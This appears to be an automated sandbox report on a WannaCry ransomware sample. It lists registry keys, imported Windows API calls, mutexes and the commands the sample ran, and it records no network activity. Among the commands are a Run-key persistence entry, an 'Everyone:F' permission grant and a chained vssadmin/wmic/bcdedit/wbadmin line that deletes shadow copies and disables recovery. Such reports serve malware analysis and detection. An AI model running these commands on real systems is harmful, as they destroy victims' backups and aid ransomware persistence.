HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDetectedUrl
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptImportKey
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptEncrypt
advapi32.dll.CryptDecrypt
advapi32.dll.CryptGenKey
kernel32.dll.CreateFileW
kernel32.dll.WriteFile
kernel32.dll.ReadFile
kernel32.dll.MoveFileW
kernel32.dll.MoveFileExW
kernel32.dll.DeleteFileW
kernel32.dll.CloseHandle
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptDecrypt
kernel32.dll.GetNativeSystemInfo
kernel32.dll.InitializeCriticalSection
kernel32.dll.SetFileAttributesW
kernel32.dll.SetFileTime
kernel32.dll.SetFilePointer
kernel32.dll.GetFileTime
kernel32.dll.GetFileSizeEx
kernel32.dll.MultiByteToWideChar
kernel32.dll.GetFileAttributesW
kernel32.dll.FindClose
kernel32.dll.FindNextFileW
kernel32.dll.FindFirstFileW
kernel32.dll.ExitThread
kernel32.dll.LeaveCriticalSection
kernel32.dll.EnterCriticalSection
kernel32.dll.Sleep
kernel32.dll.GetTempFileNameW
kernel32.dll.FlushFileBuffers
kernel32.dll.CopyFileW
kernel32.dll.CreateFileA
kernel32.dll.CreateThread
kernel32.dll.GetFileAttributesA
kernel32.dll.CreateMutexA
kernel32.dll.OpenMutexA
kernel32.dll.GetFullPathNameA
kernel32.dll.CopyFileA
kernel32.dll.CreateDirectoryW
kernel32.dll.GetTempPathW
kernel32.dll.GetWindowsDirectoryW
kernel32.dll.GetDiskFreeSpaceExW
kernel32.dll.GetDriveTypeW
kernel32.dll.WideCharToMultiByte
kernel32.dll.InterlockedExchange
kernel32.dll.InterlockedExchangeAdd
kernel32.dll.GetLogicalDrives
kernel32.dll.DeleteFileA
kernel32.dll.SetCurrentDirectoryW
kernel32.dll.GetModuleFileNameW
kernel32.dll.DeleteCriticalSection
kernel32.dll.GetComputerNameW
kernel32.dll.GetCurrentDirectoryA
kernel32.dll.LocalFree
kernel32.dll.GetCurrentProcess
kernel32.dll.GetLastError
kernel32.dll.GlobalAlloc
kernel32.dll.LoadLibraryA
kernel32.dll.GetProcAddress
kernel32.dll.GlobalFree
kernel32.dll.GetTickCount
kernel32.dll.CreateProcessA
kernel32.dll.WaitForSingleObject
kernel32.dll.TerminateProcess
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileSize
user32.dll.SystemParametersInfoW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.CryptExportKey
advapi32.dll.CryptReleaseContext
advapi32.dll.GetSecurityInfo
advapi32.dll.SetEntriesInAclA
advapi32.dll.SetSecurityInfo
advapi32.dll.CheckTokenMembership
advapi32.dll.FreeSid
advapi32.dll.GetUserNameW
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.CryptGenRandom
advapi32.dll.CryptGetKeyParam
shell32.dll.SHGetFolderPathW
msvcrt.dll.fopen
msvcrt.dll.fprintf
msvcrt.dll.sprintf
msvcrt.dll.rand
msvcrt.dll.time
msvcrt.dll.srand
msvcrt.dll.wcscpy
msvcrt.dll.wcscat
msvcrt.dll.wcslen
msvcrt.dll.??2@YAPAXI@Z
msvcrt.dll.__CxxFrameHandler
msvcrt.dll.??3@YAXPAX@Z
msvcrt.dll.swprintf
msvcrt.dll._except_handler3
msvcrt.dll.fread
msvcrt.dll.wcsrchr
msvcrt.dll.wcsncpy
msvcrt.dll.wcscmp
msvcrt.dll._wcsnicmp
msvcrt.dll.strncmp
msvcrt.dll.wcschr
msvcrt.dll._wfopen
msvcrt.dll._ftol
msvcrt.dll.??0exception@@QAE@ABV0@@Z
msvcrt.dll.??1exception@@UAE@XZ
msvcrt.dll.??0exception@@QAE@ABQBD@Z
msvcrt.dll._CxxThrowException
msvcrt.dll.??1type_info@@UAE@XZ
msvcrt.dll.free
msvcrt.dll._initterm
msvcrt.dll.malloc
msvcrt.dll._adjust_fdiv
msvcrt.dll.fwrite
msvcrt.dll.fclose
msvcrt.dll._wcsicmp
msvcrt.dll._local_unwind2
msvcrt.dll.wcsstr
msvcp60.dll.?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z
msvcp60.dll.?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB
msvcp60.dll.?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB
msvcp60.dll.?_Xran@std@@YAXXZ
msvcp60.dll.?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ
msvcp60.dll.?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z
msvcp60.dll.??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
msvcp60.dll.?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z
msvcp60.dll.?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z
advapi32.dll.ConvertSidToStringSidW
ntmarta.dll.GetMartaExtensionInterface
sechost.dll.LookupAccountNameLocalW
cryptsp.dll.CryptGenKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptGetKeyParam
cryptsp.dll.CryptEncrypt
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptGenRandom
cryptsp.dll.CryptReleaseContext
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
cryptbase.dll.SystemFunction036
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
kernel32.dll.HeapSetInformation
sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid
dwmapi.dll.DwmIsCompositionEnabled
ole32.dll.CoCreateInstance
sxs.dll.SxsOleAut32RedirectTypeLibrary
advapi32.dll.RegOpenKeyW
advapi32.dll.RegQueryValueW
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
advapi32.dll.SetSecurityDescriptorDacl
advapi32.dll.IsTextUnicode
comctl32.dll.#328
comctl32.dll.#334
comctl32.dll.#332
comctl32.dll.#338
propsys.dll.PSCreateMemoryPropertyStore
ole32.dll.CoTaskMemAlloc
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
comctl32.dll.#236
oleaut32.dll.#6
ole32.dll.CoGetMalloc
ole32.dll.CreateBindCtx
comctl32.dll.#320
ole32.dll.StringFromGUID2
comctl32.dll.#324
comctl32.dll.#323
advapi32.dll.RegEnumKeyW
oleaut32.dll.#2
comctl32.dll.#339
advapi32.dll.OpenThreadToken
shell32.dll.#102
ole32.dll.CoInitializeEx
ole32.dll.CoUninitialize
sechost.dll.ConvertSidToStringSidW
profapi.dll.#104
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
ole32.dll.PropVariantClear
oleaut32.dll.#9
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#386
ole32.dll.CoTaskMemFree
apphelp.dll.ApphelpCheckShellObject
linkinfo.dll.CreateLinkInfoW
user32.dll.IsCharAlphaW
user32.dll.CharPrevW
ntshrui.dll.GetNetResourceFromLocalPathW
srvcli.dll.NetShareEnum
cscapi.dll.CscNetApiGetInterface
slc.dll.SLGetWindowsInformationDWORD
shlwapi.dll.PathRemoveFileSpecW
linkinfo.dll.DestroyLinkInfo
ole32.dll.CoRevokeInitializeSpy
comctl32.dll.#388
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
oleaut32.dll.#500
netutils.dll.NetApiBufferFree
advapi32.dll.UnregisterTraceGuids
comctl32.dll.#321
comctl32.dll.DSA_Create
rpcrt4.dll.NdrClientCall3
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcBindingSetAuthInfoExW
rpcrt4.dll.RpcStringFreeW
rpcrt4.dll.RpcBindingFree
comctl32.dll.#393
kernel32.dll.WerRegisterMemoryBlock
ole32.dll.CreateStreamOnHGlobal
oleaut32.dll.#8
oleaut32.dll.#10
propsys.dll.InitPropVariantFromStringAsVector
propsys.dll.PSCoerceToCanonicalValue
propsys.dll.VariantToStringAlloc
propsys.dll.VariantToString
propsys.dll.PSPropertyBag_ReadStrAlloc
api-ms-win-downlevel-shlwapi-l1-1-0.dll.PathCreateFromUrlW
sfc.dll.SfcIsFileProtected
setupapi.dll.PnpIsFilePnpDriver
devrtl.dll.DevRtlGetThreadLogToken
ole32.dll.OleUninitialize
kernel32.dll.TryEnterCriticalSection
kernel32.dll.SetCriticalSectionSpinCount
lpk.dll.LpkEditControl
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.ReleaseSRWLockExclusive
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegisterTraceGuidsW
api-ms-win-downlevel-advapi32-l1-1-0.dll.OpenThreadToken
api-ms-win-downlevel-advapi32-l1-1-0.dll.OpenProcessToken
api-ms-win-downlevel-advapi32-l1-1-0.dll.AllocateAndInitializeSid
api-ms-win-downlevel-advapi32-l1-1-0.dll.CheckTokenMembership
api-ms-win-downlevel-advapi32-l1-1-0.dll.FreeSid
advapi32.dll.RegisterTraceGuidsA
advapi32.dll.EventSetInformation
comctl32.dll.InitCommonControlsEx
comctl32.dll.RegisterClassNameW
uxtheme.dll.EnableThemeDialogTexture
uxtheme.dll.OpenThemeData
uxtheme.dll.GetThemeBool
comctl32.dll.HIMAGELIST_QueryInterface
comctl32.dll.DrawShadowText
comctl32.dll.DrawSizeBox
comctl32.dll.DrawScrollBar
comctl32.dll.SizeBoxHwnd
comctl32.dll.ScrollBar_MouseMove
comctl32.dll.ScrollBar_Menu
comctl32.dll.HandleScrollCmd
comctl32.dll.DetachScrollBars
comctl32.dll.AttachScrollBars
comctl32.dll.CCSetScrollInfo
comctl32.dll.CCGetScrollInfo
comctl32.dll.CCEnableScrollBar
comctl32.dll.QuerySystemGestureStatus
uxtheme.dll.#49
uxtheme.dll.CloseThemeData
uxtheme.dll.IsThemePartDefined
uxtheme.dll.GetThemeFont
uxtheme.dll.GetThemeColor
imm32.dll.ImmGetContext
imm32.dll.ImmReleaseContext
imm32.dll.ImmAssociateContext
imm32.dll.ImmIsIME
uxtheme.dll.GetThemeInt
uxtheme.dll.GetThemeMargins
uxtheme.dll.SetWindowTheme
uxtheme.dll.DrawThemeBackground
gdi32.dll.GetLayout
gdi32.dll.GdiRealizationInfo
gdi32.dll.FontIsLinked
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
gdi32.dll.GetTextFaceAliasW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
gdi32.dll.GetFontAssocStatus
advapi32.dll.RegQueryValueExA
advapi32.dll.RegEnumKeyExW
gdi32.dll.GdiIsMetaPrintDC
api-ms-win-downlevel-advapi32-l1-1-0.dll.UnregisterTraceGuids
kernel32.dll.SetProcessDEPPolicy
netapi32.dll.NetStatisticsGet
netapi32.dll.NetApiBufferFree
advapi32.dll.CryptAcquireContextW
cryptsp.dll.CryptAcquireContextW
user32.dll.GetForegroundWindow
user32.dll.GetCursorInfo
user32.dll.GetQueueStatus
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Heap32First
kernel32.dll.Heap32Next
kernel32.dll.Heap32ListFirst
kernel32.dll.Heap32ListNext
kernel32.dll.Process32First
kernel32.dll.Process32Next
kernel32.dll.Thread32First
kernel32.dll.Thread32Next
kernel32.dll.Module32First
kernel32.dll.Module32Next
kernel32.dll.GetTickCount64
iphlpapi.dll.GetAdaptersAddresses
wtsapi32.dll.WTSEnumerateSessionsA
wtsapi32.dll.WTSFreeMemory
winsta.dll.WinStationEnumerateW
advapi32.dll.CreateWellKnownSid
rpcrt4.dll.NdrClientCall2
rpcrt4.dll.I_RpcExceptionFilter
winsta.dll.WinStationFreeMemory
advapi32.dll.LookupPrivilegeValueA
advapi32.dll.AdjustTokenPrivileges
advapi32.dll.DuplicateTokenEx
advapi32.dll.CreateProcessAsUserA
kernel32.dll.WTSGetActiveConsoleSessionId
userenv.dll.CreateEnvironmentBlock
userenv.dll.DestroyEnvironmentBlock
wtsapi32.dll.WTSQueryUserToken
usp10.dll.ScriptGetProperties
usp10.dll.ScriptItemize
msls31.dll.#71
msls31.dll.#1
msls31.dll.#52
msls31.dll.#48
msls31.dll.#3
msls31.dll.#44
msls31.dll.#42
msls31.dll.#59
uxtheme.dll.BufferedPaintInit
uxtheme.dll.BufferedPaintRenderAnimation
uxtheme.dll.GetThemeTransitionDuration
uxtheme.dll.BeginBufferedAnimation
uxtheme.dll.IsThemeBackgroundPartiallyTransparent
uxtheme.dll.DrawThemeParentBackground
uxtheme.dll.GetThemeBackgroundContentRect
uxtheme.dll.DrawThemeText
uxtheme.dll.EndBufferedAnimation
msls31.dll.#5
uxtheme.dll.GetThemePartSize
msls31.dll.#40
uxtheme.dll.DrawThemeParentBackgroundEx
uxtheme.dll.BeginBufferedPaint
uxtheme.dll.EndBufferedPaint
gdi32.dll.GetTextExtentExPointWPri
uxtheme.dll.GetThemeTextExtent
msls31.dll.#43
msls31.dll.#60
ole32.dll.CLSIDFromOle1Class
clbcatq.dll.GetCatalogObject
clbcatq.dll.GetCatalogObject2
thumbcache.dll.DllGetClassObject
thumbcache.dll.DllCanUnloadNow
propsys.dll.DllGetClassObject
propsys.dll.DllCanUnloadNow
actxprxy.dll.DllGetClassObject
actxprxy.dll.DllCanUnloadNow
advapi32.dll.StartServiceW
ws2_32.dll.#3
winhttp.dll.WinHttpCloseHandle
user32.dll.UnhookWindowsHookEx
user32.dll.UnregisterPowerSettingNotification
powrprof.dll.PowerSettingUnregisterNotification
user32.dll.DestroyWindow
user32.dll.UnregisterClassW
winsta.dll.WinStationUnRegisterConsoleNotification
rpcrt4.dll.RpcAsyncGetCallStatus
rpcrt4.dll.RpcAsyncCancelCall
rpcrt4.dll.RpcAsyncCompleteCall
kernel32.dll.FlsFree
kernel32.dll.RegQueryValueExW
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
ole32.dll.CoRegisterClassObject
vss_ps.dll.DllGetClassObject
vss_ps.dll.DllCanUnloadNow
advapi32.dll.LookupAccountNameW
samcli.dll.NetLocalGroupGetMembers
samlib.dll.SamConnect
samlib.dll.SamOpenDomain
samlib.dll.SamLookupNamesInDomain
samlib.dll.SamOpenAlias
samlib.dll.SamFreeMemory
samlib.dll.SamCloseHandle
samlib.dll.SamGetMembersInAlias
ole32.dll.CoCreateGuid
ole32.dll.StringFromCLSID
oleaut32.dll.#4
oleaut32.dll.#7
propsys.dll.VariantToPropVariant
catsrvut.dll.CreateComRegDBWriter
vssapi.dll.CreateWriter
propsys.dll.PropVariantToVariant
ole32.dll.CoDisconnectObject
ole32.dll.CoDisconnectContext
catsrvut.dll.DestroyComRegDBWriter
ole32.dll.CoRevokeClassObject
kernel32.dll.GetModuleHandleW
urlmon.dll.DllCanUnloadNow
urlmon.dll.IEDllLoader
urlmon.dll.CoInternetCreateZoneManager
urlmon.dll.CoInternetGetSession
urlmon.dll.CopyBindInfo
urlmon.dll.CreateURLMoniker
urlmon.dll.RegisterBindStatusCallback
urlmon.dll.ReleaseBindInfo
urlmon.dll.RevokeBindStatusCallback
urlmon.dll.UrlMkGetSessionOption
urlmon.dll.CoInternetCreateSecurityManager
urlmon.dll.CreateUri
urlmon.dll.CoInternetCombineUrl
urlmon.dll.CoInternetGetSecurityUrl
urlmon.dll.IsValidURL
wininet.dll.InternetCrackUrlW
wininet.dll.InternetCreateUrlW
api-ms-win-downlevel-shlwapi-l2-1-0.dll.IUnknown_QueryService
kernel32.dll.GetThreadPreferredUILanguages
kernel32.dll.SetThreadPreferredUILanguages
kernel32.dll.LocaleNameToLCID
kernel32.dll.GetLocaleInfoEx
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetSystemDefaultLocaleName
kernel32.dll.RegOpenKeyExW
user32.dll.LoadStringW
ntdll.dll.EtwUnregisterTraceGuids
wbemcore.dll.Reinitialize
wbemsvc.dll.DllGetClassObject
wbemsvc.dll.DllCanUnloadNow
kernelbase.dll.AllocateAndInitializeSid
sspicli.dll.LogonUserExExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsSetValue
kernel32.dll.FlsGetValue
kernel32.dll.LCMapStringEx
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.InitOnceExecuteOnce
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.GetFileInformationByHandleEx
kernel32.dll.SetFileInformationByHandle
kernel32.dll.InitializeConditionVariable
kernel32.dll.WakeConditionVariable
kernel32.dll.WakeAllConditionVariable
kernel32.dll.SleepConditionVariableCS
kernel32.dll.InitializeSRWLock
kernel32.dll.TryAcquireSRWLockExclusive
kernel32.dll.SleepConditionVariableSRW
kernel32.dll.CreateThreadpoolWork
kernel32.dll.SubmitThreadpoolWork
kernel32.dll.CloseThreadpoolWork
kernel32.dll.CompareStringEx
api-ms-win-core-synch-l1-2-0.dll.InitializeConditionVariable
api-ms-win-core-synch-l1-2-0.dll.SleepConditionVariableCS
api-ms-win-core-synch-l1-2-0.dll.WakeAllConditionVariable
kernel32.dll.CreateHardLinkW
msi.dll.#173
msi.dll.#45
msi.dll.#39
user32.dll.GetKeyboardLayoutList
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
secur32.dll.GetUserNameExW
shell32.dll.CommandLineToArgvW
user32.dll.RegisterClassExW
imm32.dll.ImmDisableIME
user32.dll.CreateWindowExW
user32.dll.DefWindowProcW
user32.dll.RegisterRawInputDevices
user32.dll.SetTimer
user32.dll.SetWindowLongPtrW
user32.dll.SetWindowsHookExW
user32.dll.MsgWaitForMultipleObjects
secur32.dll.InitSecurityInterfaceW
cryptsp.dll.SystemFunction035
normaliz.dll.IdnToAscii
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetTokenInformation
secur32.dll.GetUserNameExA
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertSidToStringSidW
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventRegister
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueA
iertutil.dll.#701
iertutil.dll.#703
iertutil.dll.#702
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExA
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemAlloc
ws2_32.dll.#115
ws2_32.dll.#111
iertutil.dll.#791
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventActivityIdControl
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExW
iphlpapi.dll.GetBestInterfaceEx
iphlpapi.dll.GetIfEntry2
api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHGetValueA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegSetValueExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegDeleteValueW
dnsapi.dll.DnsGetProxyInformation
ws2_32.dll.#23
ws2_32.dll.#21
ws2_32.dll.WSAIoctl
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser
iphlpapi.dll.NotifyUnicastIpAddressChange
api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventWrite
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
ws2_32.dll.GetAddrInfoW
dhcpcsvc.dll.DhcpRequestParams
iphlpapi.dll.ConvertInterfaceGuidToLuid
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
nsi.dll.NsiAllocateAndGetTable
cfgmgr32.dll.CM_Open_Class_Key_ExW
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
nsi.dll.NsiFreeTable
winhttp.dll.WinHttpOpen
winhttp.dll.WinHttpGetProxyForUrl
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
api-ms-win-downlevel-ole32-l1-1-0.dll.StringFromIID
api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize
winhttp.dll.WinHttpSetOption
winhttp.dll.WinHttpSetTimeouts
winhttp.dll.WinHttpConnect
winhttp.dll.WinHttpOpenRequest
winhttp.dll.WinHttpSetStatusCallback
wininet.dll.InternetGetCookieExW
winhttp.dll.WinHttpAddRequestHeaders
winhttp.dll.WinHttpSendRequest
ws2_32.dll.WSASocketW
ws2_32.dll.#2
ws2_32.dll.#9
ws2_32.dll.FreeAddrInfoW
api-ms-win-downlevel-ole32-l1-1-0.dll.CoSetProxyBlanket
ole32.dll.ObjectStublessClient10
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegEnumKeyExW
user32.dll.PeekMessageW
user32.dll.TranslateMessage
user32.dll.DispatchMessageW
user32.dll.GetWindowLongPtrW
user32.dll.RegisterPowerSettingNotification
powrprof.dll.PowerSettingRegisterNotification
user32.dll.GetWindowThreadProcessId
user32.dll.GetWindowTextW
user32.dll.KillTimer
ws2_32.dll.WSAGetOverlappedResult
wininet.dll.DllGetClassObject
wininet.dll.DllCanUnloadNow
api-ms-win-downlevel-ole32-l1-1-0.dll.CoImpersonateClient
api-ms-win-downlevel-ole32-l1-1-0.dll.CoRevertToSelf
api-ms-win-downlevel-advapi32-l1-1-0.dll.CopySid
api-ms-win-downlevel-advapi32-l1-1-0.dll.EqualSid
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthorityCount
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthority
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventUnregister
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCloseKey
shell32.dll.SHGetKnownFolderPath
attrib +h .
icacls . /grant Everyone:F /T /C /Q
taskdl.exe
@WanaDecryptor@.exe fi
275781765172918.bat
C:\Windows\system32\cmd.exe /c 275781765172918.bat
@WanaDecryptor@.exe co
cmd.exe /c start /b @WanaDecryptor@.exe vs
taskse.exe C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qobyhffdhzmp201" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\tasksche.exe\"" /f
cscript.exe //nologo m.vbs
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /user
TaskData\Tor\taskhsvc.exe
@WanaDecryptor@.exe vs
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qobyhffdhzmp201" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\tasksche.exe\"" /f
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
C:\Windows\System32\Wbem\WMIC.exe wmic shadowcopy delete
C:\Windows\system32\vssvc.exe
MsWinZonesCacheCounterMutexA
Global\MsWinZonesCacheCounterMutexW
Global\MsWinZonesCacheCounterMutexA0
CDBurnNotify
Global\CDBurnExclusive
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwWriterMutex
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_32.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_96.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_256.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1024.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_sr.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwReaderRefs
CicLoadWinStaWinSta0
Local\MSCTF.CtfMonitorInstMutexDefault1
Local\ClickToRun_User_SingleInstance_16
Global\ClickToRun_ExecutionContext
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
Global\ClickToRun_AC2F0D89-6518-48E9-A0D9-EF039C456034
VSS
No results
Sorry! No behavior.
Sorry! No tracee.
Sorry! No strace.
Sorry! No tracee.

No hosts contacted.

No TCP connections recorded.

No UDP connections recorded.

No domains contacted.

HTTP Requests

No HTTP(s) requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No Suricata Extracted files.
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.